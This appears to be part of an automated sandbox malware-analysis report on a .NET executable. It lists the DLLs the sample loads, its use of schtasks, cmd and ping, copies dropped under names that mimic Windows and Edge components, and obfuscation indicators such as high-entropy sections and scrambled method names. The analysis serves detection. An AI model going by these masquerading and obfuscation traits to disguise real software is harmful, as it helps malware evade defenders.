                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: apphelp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: version.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: wldp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: profapi.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: version.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: wldp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: profapi.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: version.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: wldp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: profapi.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: 0JLWNg4Sz1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: 0JLWNg4Sz1.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                              Source: 0JLWNg4Sz1.exe Static file information: File size 1688064 > 1048576
                              Source: 0JLWNg4Sz1.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x19ba00
                              Source: 0JLWNg4Sz1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                              Data Obfuscation

                              Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.cs .Net Code: Type.GetTypeFromHandle(WwK3d2aiJO0tV2nA8Ro.ST5mIdcdDJI(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(WwK3d2aiJO0tV2nA8Ro.ST5mIdcdDJI(16777245)),Type.GetTypeFromHandle(WwK3d2aiJO0tV2nA8Ro.ST5mIdcdDJI(16777259))})
                              Source: 0JLWNg4Sz1.exe Static PE information: section name: .text entropy: 7.448087998754818
                              Source: DViaOgnvmAhwCXZ.exe.0.dr Static PE information: section name: .text entropy: 7.448087998754818
                              Source: DViaOgnvmAhwCXZ.exe0.0.dr Static PE information: section name: .text entropy: 7.448087998754818
                              Source: smartscreen.exe.0.dr Static PE information: section name: .text entropy: 7.448087998754818
                              Source: StartMenuExperienceHost.exe.0.dr Static PE information: section name: .text entropy: 7.448087998754818
                              Source: 0JLWNg4Sz1.exe, yc3dPprHKSGAWfjjOTe.csHigh entropy of concatenated method names: 'wbkbQtq0Zln', 'qYWr0TUYwv', 'p4Ur244sfc', 'MKAryKx1B1', 'nBHLHObKo1IP6u7P30nk', 'ofbnuGbKWynTFpPkmGHP', 'CGFjagbKSvZ4hb27KuGE', 'cBJybqbKLCa1he8mRoPc', 'RSGiJ0bKJKlyxNVE43s1', 'WmJtkNbKUpB3pJPHIfCl'
                              Source: 0JLWNg4Sz1.exe, bO8JFAAd3ZAlHLFJ6eR.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'tSXbQAXSZJu', 'PdlbAbXx1ob', 'e6sJGjbuciQt6jHr8XSv', 'qejCx5bu7aeQ6djOkIty', 'Il2sC9buqwXH90lWp3FW', 'wtx1J6bufqjPZphTEDys', 'CyS4SQbuMMG0CQDfe79J'
                              Source: 0JLWNg4Sz1.exe, TjDulSuvXpZoRMMd7L9.csHigh entropy of concatenated method names: 'WwJp6w5kkN', 'cd8pbCBnOk', 'Yd7', 'O27pmE2Uuj', 'ngTpPtkfUh', 'R10pAZJDkF', 'BNRpIjphdT', 'BM893sbyyk0kMf6yn1Ch', 'KO05r2byEyLHQmwPQZ3a', 'lRopdbbyG3oTZ97Z9Veo'
                              Source: 0JLWNg4Sz1.exe, t56Qn6PEBQPJ6naQoFO.csHigh entropy of concatenated method names: 'IBjAPGcYj4', 'eBMAAiL7Yc', 'UPYAIRoCsl', 'fsIlknbuAEN1Iv4grxJA', 'VBWgtabuIRaqYVRTB3xt', 'kvmKO2bumdvjCUkU4lA2', 'EKyFJrbuPw9pPSo2HaM8', 'cxeA32qpxH', 'yiYvBJbuRdEO4ixi4GRa', 'Al6fgwbu4dLZvjVEjeTg'
                              Source: 0JLWNg4Sz1.exe, ybZP7aQIdKRh1BejQUR.csHigh entropy of concatenated method names: 'O3I', 'P9X', 'ntqbAVj4H6W', 'vmethod_0', 'imethod_0', 'BC2wg9b7si4qKnFT81Ci', 'gmsvAub7iMvgM86yxI5U', 'rgYeRsb73dKGPLQ7hQHU', 'UVbpOAb7YSJJFIi9PEmc', 'aac2qhb7OLZDUWmd39uC'
                              Source: 0JLWNg4Sz1.exe, hXM1RKoIXZXneRvfhe.csHigh entropy of concatenated method names: 'brn73YGNu', 'BIkbWMbgpC6rSR5mTi7q', 'LsYTB7bgdYvAivxMQfs7', 'tyEI03bgDKLEZJXrFG9r', 'KNUmnibguYm0I07DxPto', 'GuhSkja9H', 'qpaLEe9KI', 'jynJpgQaR', 'occUg5S9U', 'umCCtUjpI'
                              Source: 0JLWNg4Sz1.exe, jgOfPCIGSkBKDbnxjsT.csHigh entropy of concatenated method names: 'wa4IFfJWI1', 'WQbIaJ636q', 'x76IvtasX1', 'BraIz7xLoQ', 'gCI867VgWx', 'J208bC7dhV', 'gTJ8mn4lpf', 'pp5Yktbdin8p9NoaqcWY', 'AuFRrtbdO9baaMtwEY4k', 'Gv3D3tbdYgv51Vh2OoKa'
                              Source: 0JLWNg4Sz1.exe, IPNsrUgpsIdnQCbNZhO.csHigh entropy of concatenated method names: 'method_0', 'C0MgcpV4HG', 'UXQg75QB9o', 'g9pgqqdPv4', 'RAkgfhSD16', 'yxigMl4ZcY', 'o96grIpmLj', 'DogMUebXSvGrLMkpFpod', 'KqndnGbXo9KyHZ2JB2IR', 'tfppWjbXWj8yAd1WjiIk'
                              Source: 0JLWNg4Sz1.exe, zfYiH1AZnhdHb38sJ98.csHigh entropy of concatenated method names: 'kjHAarsX9A', 'c9MvWBbpApARR9RwuruN', 'gCogZtbpIuWuTIodVTBv', 'JAoaSlbpmKA0cEYvoitf', 'eG6OuxbpPRaO2YlfyGMJ', 'WUWYZGbpRmwPraRZ7Kgs', 'U4w44Rbp4xBqn6MiCeBW', 'wt2X5CbpQfCdT3f8tMkv', 'neeEwubpelBSa06Cg0vt', 'iUbI8NJsKR'
                              Source: 0JLWNg4Sz1.exe, ES5rquZpoZAAnv5Doa4.csHigh entropy of concatenated method names: 'RetZcuoBhd', 'iTbZ7QBfOg', 'u5UZqZ66Vt', 'H6dZf8dhO8', 's8PZM5BEXP', 'pbnZrTblBH', 'tbwZZQFKck', 'GCiZhUPpPu', 'sfAZ9y880s', 'KIFZj2MVkg'
                              Source: 0JLWNg4Sz1.exe, d3KjZrI7sthRG79BAKM.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'cpGbA3bjavR', 'reFIfIg0Ny', 'imethod_0', 'ERiND7bp9GjwrScPk6Ey', 'yjNEafbpjlror3jSFgWP', 'gbSSilbplbIYubsiNRAf', 'fcWy0nbpH0nevdPIKnqC'
                              Source: 0JLWNg4Sz1.exe, lLsTi2wPNhEUYZSa5Ic.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'NV6wIkRvdy', 'Write', 'NXow8SZX5h', 'nnEw4EyUhK', 'Flush', 'vl7'
                              Source: 0JLWNg4Sz1.exe, g0mC6MQXJrY7NdpcS30.csHigh entropy of concatenated method names: 'fcEQ5gpgqR', 'uIpxBZbqY9y4P5QKF8Wf', 'avvGW3bqeMegw6wYeToc', 'IjsviYbq3Bs5TwB7xEAu', 'myyiF6bqsCQ2nrNQSRB4', 'P9X', 'vmethod_0', 'ijvbAw8IGON', 'imethod_0', 'AmV1gAbq8dKosmZmMRZc'
                              Source: 0JLWNg4Sz1.exe, l0haC3QwJqAsbJN04UF.csHigh entropy of concatenated method names: 'mU8QDTlfVt', 'rBrQuinQST', 'iSlQpV2Pi4', 'kYDQdEbD9v', 'q0jQcs9Bfw', 'bBUQ7fFfo4', 'NILflGb7yxFatl0uJw1b', 'idBQdVb7ElqKJFSAlGWf', 'D8Iw91b7GH3hne2iEOoN', 'JEijpYb7TyNxaNy6FdCG'
                              Source: 0JLWNg4Sz1.exe, T9WJvy5siHytZdkYCSK.csHigh entropy of concatenated method names: 'MZu51uNABU', 'OKw5SZhVLb', 'CqT5UxMagu', 'h7y5C6nJSV', 'fJq5nOkbmD', 'lOs5tmt39x', 'x6o5VKPGu3', 'qbh5gxdiKX', 'Dispose', 'EyYoHjbFAkZKL6ulPk23'
                              Source: 0JLWNg4Sz1.exe, WwK3d2aiJO0tV2nA8Ro.csHigh entropy of concatenated method names: 'ST5mIdcdDJI', 'vicmIclHRnv', 'vGX9KgbauanjpLdC32rZ', 'KFMv7bbapSqRA9My4Slf', 'hkmhaAbadQtKHBHZxStr', 'pXagANbacQXxHv1kIP8a', 'oo5UV2ba7wky7M3VpV6O'
                              Source: 0JLWNg4Sz1.exe, G3ng6bmEg2NnX6OJK55.csHigh entropy of concatenated method names: 'NxNP4PPfvj', 'xHv7l1bDbBcCfWBNtomC', 'TRipZNbDm6G7BD9cxXGU', 'GriWZubDPOML7HWioRtr', 'eSi1tTbBznY7Y40mT104', 'XEoQaJbD6JWVg5tZ64hR', 'fDpARPbDA8wbvvW4Eu0R', 'XdoP6Qa0qd', 'n8EPm8MCUM', 'aYHPPiIvF7'
                              Source: 0JLWNg4Sz1.exe, m8bnl8L55T72dLEBlaQ.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'WsNLFDEmuI', 'JiKbQWrUSUl', 'QStgwcb9BorWT4x9LD2Z', 'a2Au9ab9gfEg6HOsejBl', 'Fc5BRUb9wM2Prmtuebp6', 'jiys1ab9DF4l9he9aUUm', 'UiI3P9b9uCABYybER9Nl'
                              Source: 0JLWNg4Sz1.exe, CKHAaTrRBZ3vc0rSSMd.csHigh entropy of concatenated method names: 'SmQrttcvO6', 'kKHh92bK8ofimpo11QFS', 'hs5KZrbK42eg8JBAkgKF', 'rxyYwfbKAHftg37aZGDd', 'hFLywGbKI5G7SXkp8wU9', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
                              Source: 0JLWNg4Sz1.exe, LYF8x3KMkw2ZP2d0YDG.csHigh entropy of concatenated method names: 'mwFbQgNbWkB', 'jwDb8VPpRny', 'bjXMv6bxPAWwZRdvtAJt', 'OMxNL9bxbIlUSHFrvP1h', 'rFBXOrbxmssuGVWs3bsQ', 'fwcHcSbxAMncMB2Ywd6x', 'zq3rRRbx87Zq6m7Co73r', 'x2DxKQbx4CU40RaFlSFy', 'CH2UgZbxQZPMcYpMPCnl', 'imethod_0'
                              Source: 0JLWNg4Sz1.exe, oC7amm4RQG8WfHWfygR.csHigh entropy of concatenated method names: 'JWw43GwoCR', 'CHf4YrF0px', 'Hg0gN1bcNEnQ3W1lSdOo', 'IU0yUebcOUjP80M1DIuN', 'fWyjXVbc1vmlakBJ8YgV', 'c53UkQbcoxxq7FWuLsBw', 'L4x5fPbcWxhiJnmR82Mh', 'gkUsNebcSXEYEiNbRxP8'
                              Source: 0JLWNg4Sz1.exe, QIE7HsKpvhlpcEmjKXN.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'rKoKckQBbU', 'Jj6fRlb5pFHtIa1r1uFV', 'bdAHTWb5daLLiqNX6iwu', 'aXheh2b5c9qAaqZXZide', 'tmVMUZb570ZXe1KqnMYk', 'tyN9wFb5q3LNeOARZWMo', 'Ru3Fglb5fu6KuDo6Qfiy'
                              Source: 0JLWNg4Sz1.exe, SF80mm87HsL0NUZ7oPJ.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'dLgbQeKQrgO', 'PdlbAbXx1ob', 'Nt6gG9bdlw7NYmEYjvd0', 'zvOFPKbdHkFrxx7lQERW', 'G3dBBIbdXls3UnxuyroQ'
                              Source: 0JLWNg4Sz1.exe, Ta5YhNfqBOqujlHd8a0.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'Guq3TIbTUqCvNm3krE1A', 'dcTmCxbTLKeqLfjue5nc', 'h2ob4GbTJHqTFXeb2aLp'
                              Source: 0JLWNg4Sz1.exe, P6T7Tb49C9xOmYMOwCl.csHigh entropy of concatenated method names: 'PTu45Ge5f3', 'BRF4xcpPjq', 'zmaMibb7IobC1Zs1S0kV', 'PDYKykb78v27Sv6mmP4F', 'W9v4l3dtCn', 'wVH4H0CoFp', 'xsX4XBBmOX', 'uVx40Lbtms', 'MXd424P4eY', 'Tsh4yBw7PY'
                              Source: 0JLWNg4Sz1.exe, MRAl0GIZEPGAxLPqvt3.csHigh entropy of concatenated method names: 'q64', 'P9X', 'xJLbAipDaHa', 'vmethod_0', 'r9DbQ8MmIEi', 'imethod_0', 'rHixBZbpE5IhOfQWG1i6', 'yaQd3abpG2ONCGFhpDEQ', 'wdamVFbpTBYmL3Dnjngs', 'NgWQrPbpK2sIMtoSdxCa'
                              Source: 0JLWNg4Sz1.exe, L6R8fXmLAk8EvkGmlSM.csHigh entropy of concatenated method names: 'fjImUHWx5V', 'p0UmCewtKW', 'yVCXQXbBguAyY1KYNM6o', 'AcupoVbBwnDqPwPOJ8Ts', 'T3kbw2bBBfl8Wqp2L3Z3', 'HNM4DUbBDPDNkeqIR6CZ', 'YSESuPbBuByQ4o6slBhV', 'gqbBrfbBpnvLxp7wfLec'
                              Source: 0JLWNg4Sz1.exe, gZeU985hEAJd8mn80wu.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'IP25jdfn6I', 'uiQ5lIwcck', 'DMV5HmrywR', 'Dispose', 'OlG3U0bFLXWwncKJYAgC', 'TYPgaKbFJybhIBUh5lNr', 'CsTLBubFUhckEw2O3BAW', 'PYdbVXbFCaEDqpbrGU1C'
                              Source: 0JLWNg4Sz1.exe, QQwSq6Jbr3ePeqrlNbU.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'k63bQSHLPeA', 'cakbQL60Qoh', 'lOdoMRb9cQSBGTfr0MJp', 's5Ljmlb97mux0eoIpr4S', 'MTkA0sb9q0Ody7LCrk1l', 'PTQUPVb9fVyQNO31kjnB', 'X4lkGqb9Mn7t2xfkJkXi', 'TFW5fvb9r02cmYeeCdra'
                              Source: 0JLWNg4Sz1.exe, alltXiUsPRGraeial9Z.csHigh entropy of concatenated method names: 'o0DnbKIwvG', 'hd4Yg9blCsR2ZPSrHFyn', 'imZaknblJ6McB1sE9elE', 'NxbOyjblU8lDyHNiAZhD', 'o3UYdNbln6DN7JoLfxaV', 'C1BUOgYhtC', 'VYuU1mymoo', 'NhsUNCNa4i', 'TsTUomj5wW', 'VFOUWdOWAU'
                              Source: 0JLWNg4Sz1.exe, BiGMOUBTBON1cqgSoIM.csHigh entropy of concatenated method names: 'Ne8BkNeadc', 'ObmB5h1pum', 'utoBxThBaF', 'fCKBFkJ7PW', 'QfeBaGNXPg', 'OgrZ8Vb09MXidj876DMi', 'C5mEtlb0Zd5ymx41QMXe', 'RUCyrJb0hNcvQSq0exp9', 'mPeP0fb0jeqSE7IEiILK', 'YXXTn3b0lv8K7uPIPBJW'
                              Source: 0JLWNg4Sz1.exe, Qy7wX2SK0PUTXEoL22I.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'OZebQsAWCWN', 'BsZbAXZTe81', 'uB77IZbh1FoyMknNTPx2', 'eZKe13bhNPvf8h1V2Eue', 'eQQMSmbhop4YZAcBBlSn', 'PAKBc5bhW7yImVFPnCHE', 'xAGNYTbhSZni8N6ebC85'
                              Source: 0JLWNg4Sz1.exe, LM0kccAVQ5qbMJjpZFH.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'n2HbQPyjNdG', 'PdlbAbXx1ob', 'Q6UO4dbunHFvTWcnTkXL', 'lpaoawbutmCvYXEXWOZl', 'amJ92wbuV7dgNUA9PESA'
                              Source: 0JLWNg4Sz1.exe, u4Lt9yBv3ln6Ey5gaQr.csHigh entropy of concatenated method names: 'ecnD6Td8Gh', 'Lr2DbLWIlj', 'd6WDmDM16n', 'YQtDPc1qER', 'PJwDA0kQMW', 'Tj6DIxy2sL', 'mpJ1fXb02wKHjqVHkT0l', 'q8TBNib0yLU9Sf51mHvQ', 'XHfDNYb0EymHlV7vt7mJ', 'jEehVNb0GYDGJ0k9dLKw'
                              Source: 0JLWNg4Sz1.exe, FOoCLDOClwF6n8gRt6h.csHigh entropy of concatenated method names: 'dYZSsgNPP1', 'cAdSioTOy0', 'FbCYaWbZZBSRBpE3Cyrj', 'fLhVw9bZMKRb215d6aSe', 'd31iRLbZrRJkUAbiBQpw', 'xwFA9CbZhDoxEeHf7Zem', 'TIBINSbZ9Z6hdN0U8rky', 'f8GSSeSuPd', 'G4NIZ6bZl5tMNTsh7Lk1', 'IQrlCMbZHQkkhf8MEks9'
                              Source: 0JLWNg4Sz1.exe, KAxV1cLyU3xgnSNaKuN.csHigh entropy of concatenated method names: 'P8ibQNOjVVl', 'aTYLGA033S', 'catbQoeQP2T', 'XqgUK0b9LQw8hs5Tv982', 'JaLguub9Jkf1TdvkqhSe', 'S2E2W5b9W7E0GhotinQa', 'wJcUupb9SjOHo3du7xjw', 'CqrOnfb9U3yuW6WmYP6N', 'dWu3t6b9CXOKs6n64NhQ', 'SVkKYbb9nBwZl3YMav5Q'
                              Source: 0JLWNg4Sz1.exe, RqEvCqRnA6B1x1Fg18M.csHigh entropy of concatenated method names: 'VuM4HObMfKXYawIseyxq', 'A2rlJDbM7oEgFFIWWYU8', 'P9eqaTbMqZFbTghGwafA', 'Cqi8dJbMMk7TkvZ0Ixwe', 'SbyivyPaZB', 'EDHgFqbM9yrAvq72qDqO', 'm9HRjEbMZVsedoDeexwt', 'hQEn8hbMhck4OZ8bG4Mh', 'cvDObC6xjR', 'tTjBaIbMlPXxxfQLXFAk'
                              Source: 0JLWNg4Sz1.exe, omprTgJIEboMH3ZuGKb.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'NZtJ42alAh', 'vmethod_0', 'vJtJQjUSnw', 'kG3bQJKA3IC', 'q1cjEGb9l9W0uHVsDqeX', 'yE8Z07b99VG1VqqU9EPP', 'TWqFDqb9jN4ip3eL7ytx'
                              Source: 0JLWNg4Sz1.exe, CSPVqRLrUaeKAxBnaO3.csHigh entropy of concatenated method names: 'N2N', 'aHhbQOERq0N', 'VFELhdgNFy', 'k23bQ1AZtvv', 'na8V0vb98huPSGdeodOf', 'IybwnNb94dqjOYO6RAjg', 'iKEm8Zb9ATDkfMeG0kVS', 'rD62aYb9IZ2jXM3184B6', 'PhiFxGb9QtH8deqgrwms', 'OAK1N2b9RjOsYyW7LV0e'
                              Source: 0JLWNg4Sz1.exe, JMxt9k5p32I4KCJCsdm.csHigh entropy of concatenated method names: 'AgA5cf9HxC', 'Pui57H0iHM', 'IH85qPwkuN', 'sHy5fpmInH', 'Dispose', 'xqscH3bFsLhiInO7HSIu', 'U3D7nobF3IB8hkoPuRqP', 'sSqQygbFYlsh4FpfW27k', 'Oocu5kbFinRBQCywvkDm', 'LsRYcEbFOjE2lgvd1NLt'
                              Source: 0JLWNg4Sz1.exe, euDXq5lAyGT9uTRTSc.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'tWrXJe7SP'
                              Source: 0JLWNg4Sz1.exe, QMhsB8bWQINTVsc31X9.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'en4b4z5KTR3', 'PdlbAbXx1ob', 'LcxrBybwCnYSwd5sYVGA', 'REjpcAbwnyUCWRbSplHO'
                              Source: 0JLWNg4Sz1.exe, rb71eNw9GHN98tUkc5T.csHigh entropy of concatenated method names: 'FTcwaxXNdg', 'oI4wzsswMn', 'sYdwlSrkvh', 'kLlwHESJt5', 'AbvwXtXZru', 's9Yw0jC0ZX', 'WUWw2mkmXl', 'gdowyJQ5nB', 'zjuwEwKexo', 'm9RwGVKGVA'
